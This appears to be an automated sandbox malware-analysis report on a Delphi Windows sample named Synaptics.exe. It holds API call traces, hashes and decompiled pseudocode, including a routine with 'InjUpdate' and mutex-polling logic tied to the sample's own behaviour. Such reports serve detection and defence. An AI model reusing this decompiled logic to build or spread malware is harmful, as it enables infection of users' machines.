                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                          • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 296 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 297 406313-406317 296->297 298 4063f6-4063fd 296->298 299 406323-406339 lstrlen 297->299 300 406319-40631d 297->300 301 40633c-40633f 299->301 300->298 300->299 302 406341-406349 301->302 303 40634b-406353 301->303 302->303 304 40633b 302->304 303->298 305 406359-40635e 303->305 304->301 306 406360-406386 lstrcpyn LoadLibraryExA 305->306 307 406388-40638a 305->307 306->307 307->298 308 40638c-406390 307->308 308->298 309 406392-4063c2 lstrcpyn LoadLibraryExA 308->309 309->298 310 4063c4-4063f4 lstrcpyn LoadLibraryExA 309->310 310->298
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x004063f6
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633f
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406353

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                          • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00446330 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103registrylibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00446330(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x4464a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404A14(0x49eb28, _v8);
				_t25 =  *0x49eb28; // 0x0
				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
				 *0x49eb24 = _t27;
				_t29 =  *0x49e668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404A14(0x49eb2c, _v20);
				_t35 =  *0x49eb2c; // 0x0
				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
				_t38 =  *0x49eb2c; // 0x0
				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
				 *0x49eb68 = E0041AF14(1);
				E00445F34();
				 *0x49eb18 = E00445D5C(1, 1);
				_t47 = E00457FC8(1, __edi);
				_t78 =  *0x49de0c; // 0x49ebbc
				 *_t78 = _t47;
				_t49 = E004590AC(0, 1);
				_t80 =  *0x49dbcc; // 0x49ebb8
				 *_t80 = _t49;
				_t50 =  *0x49dbcc; // 0x49ebb8
				E0045AD24( *_t50, 1);
				_t53 =  *0x435da8; // 0x435dac
				E0041A634(_t53, 0x43807c, 0x43808c);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x4464af);
				E004049C0( &_v20);
				return E004049C0( &_v8);
			}

























                                                                                                                                                                                          0x00446339
                                                                                                                                                                                          0x0044633c
                                                                                                                                                                                          0x00446341
                                                                                                                                                                                          0x00446342
                                                                                                                                                                                          0x00446347
                                                                                                                                                                                          0x0044634a
                                                                                                                                                                                          0x00446356
                                                                                                                                                                                          0x00446359
                                                                                                                                                                                          0x00446367
                                                                                                                                                                                          0x00446374
                                                                                                                                                                                          0x00446379
                                                                                                                                                                                          0x00446384
                                                                                                                                                                                          0x00446389
                                                                                                                                                                                          0x00446393
                                                                                                                                                                                          0x00446398
                                                                                                                                                                                          0x0044639b
                                                                                                                                                                                          0x004463a4
                                                                                                                                                                                          0x004463a7
                                                                                                                                                                                          0x004463b8
                                                                                                                                                                                          0x004463c5
                                                                                                                                                                                          0x004463ca
                                                                                                                                                                                          0x004463da
                                                                                                                                                                                          0x004463e0
                                                                                                                                                                                          0x004463f0
                                                                                                                                                                                          0x00446401
                                                                                                                                                                                          0x00446406
                                                                                                                                                                                          0x00446417
                                                                                                                                                                                          0x00446425
                                                                                                                                                                                          0x0044642a
                                                                                                                                                                                          0x00446430
                                                                                                                                                                                          0x0044643b
                                                                                                                                                                                          0x00446440
                                                                                                                                                                                          0x00446446
                                                                                                                                                                                          0x00446448
                                                                                                                                                                                          0x00446451
                                                                                                                                                                                          0x00446460
                                                                                                                                                                                          0x00446465
                                                                                                                                                                                          0x00446474
                                                                                                                                                                                          0x00446478
                                                                                                                                                                                          0x00446485
                                                                                                                                                                                          0x00446485
                                                                                                                                                                                          0x0044648c
                                                                                                                                                                                          0x0044648f
                                                                                                                                                                                          0x00446492
                                                                                                                                                                                          0x0044649a
                                                                                                                                                                                          0x004464a7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                            • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                                                                                                                                                            • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                            • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                            • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                            • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                            • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                            • Part of subcall function 00457FC8: GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                            • Part of subcall function 00457FC8: GetDC.USER32(00000000), ref: 00458062
                                                                                                                                                                                            • Part of subcall function 00457FC8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045806C
                                                                                                                                                                                            • Part of subcall function 00457FC8: ReleaseDC.USER32 ref: 00458077
                                                                                                                                                                                            • Part of subcall function 004590AC: LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                            • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                            • Part of subcall function 004590AC: OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                            • Part of subcall function 004590AC: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00459216
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.310346720.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000005.00000002.310337987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311122230.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000005.00000002.311201870.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
                                                                                                                                                                                          • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                                                                                                                                                          • API String ID: 2984857458-974380857
                                                                                                                                                                                          • Opcode ID: a69826b5bfef80d7aad8b1e85c86a590264ebebf6df163626f0e25b26d5586a5
                                                                                                                                                                                          • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a69826b5bfef80d7aad8b1e85c86a590264ebebf6df163626f0e25b26d5586a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x49a5f6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x0
				_t97 = _t29;
				 *0x49f149 = E00477AD8(_t32, _t92, _t31, _t123, _t124);
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x0, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124);
						E00498F04(_t92, _t123, _t124);
						if(E00498B40(_t92, _t92, _t123, _t124) == 0) {
							_t49 =  *0x49f1b0; // 0x0
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x0
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x0
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x0
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x0
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x0
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x0
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98);
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137);
							E00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124);
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x0
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x0
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					E00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}






























                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e5
                                                                                                                                                                                          0x0049a3e6
                                                                                                                                                                                          0x0049a3e7
                                                                                                                                                                                          0x0049a3e8
                                                                                                                                                                                          0x0049a3e9
                                                                                                                                                                                          0x0049a3ea
                                                                                                                                                                                          0x0049a3eb
                                                                                                                                                                                          0x0049a3ef
                                                                                                                                                                                          0x0049a3f0
                                                                                                                                                                                          0x0049a3f5
                                                                                                                                                                                          0x0049a3f8
                                                                                                                                                                                          0x0049a3fd
                                                                                                                                                                                          0x0049a5ba
                                                                                                                                                                                          0x0049a5cb
                                                                                                                                                                                          0x0049a5cf
                                                                                                                                                                                          0x0049a5d4
                                                                                                                                                                                          0x0049a5d6
                                                                                                                                                                                          0x0049a5d9
                                                                                                                                                                                          0x0049a5dc
                                                                                                                                                                                          0x0049a5ee
                                                                                                                                                                                          0x0049a5ee
                                                                                                                                                                                          0x0049a40a
                                                                                                                                                                                          0x0049a416
                                                                                                                                                                                          0x0049a426
                                                                                                                                                                                          0x0049a426
                                                                                                                                                                                          0x0049a42c
                                                                                                                                                                                          0x0049a432
                                                                                                                                                                                          0x0049a435
                                                                                                                                                                                          0x0049a43e
                                                                                                                                                                                          0x0049a446
                                                                                                                                                                                          0x0049a44d
                                                                                                                                                                                          0x0049a452
                                                                                                                                                                                          0x0049a458
                                                                                                                                                                                          0x0049a465
                                                                                                                                                                                          0x0049a472
                                                                                                                                                                                          0x0049a477
                                                                                                                                                                                          0x0049a4fd
                                                                                                                                                                                          0x0049a4ff
                                                                                                                                                                                          0x0049a504
                                                                                                                                                                                          0x0049a50b
                                                                                                                                                                                          0x0049a5ac
                                                                                                                                                                                          0x0049a511
                                                                                                                                                                                          0x0049a513
                                                                                                                                                                                          0x0049a51a
                                                                                                                                                                                          0x0049a528
                                                                                                                                                                                          0x0049a538
                                                                                                                                                                                          0x0049a542
                                                                                                                                                                                          0x0049a545
                                                                                                                                                                                          0x0049a54f
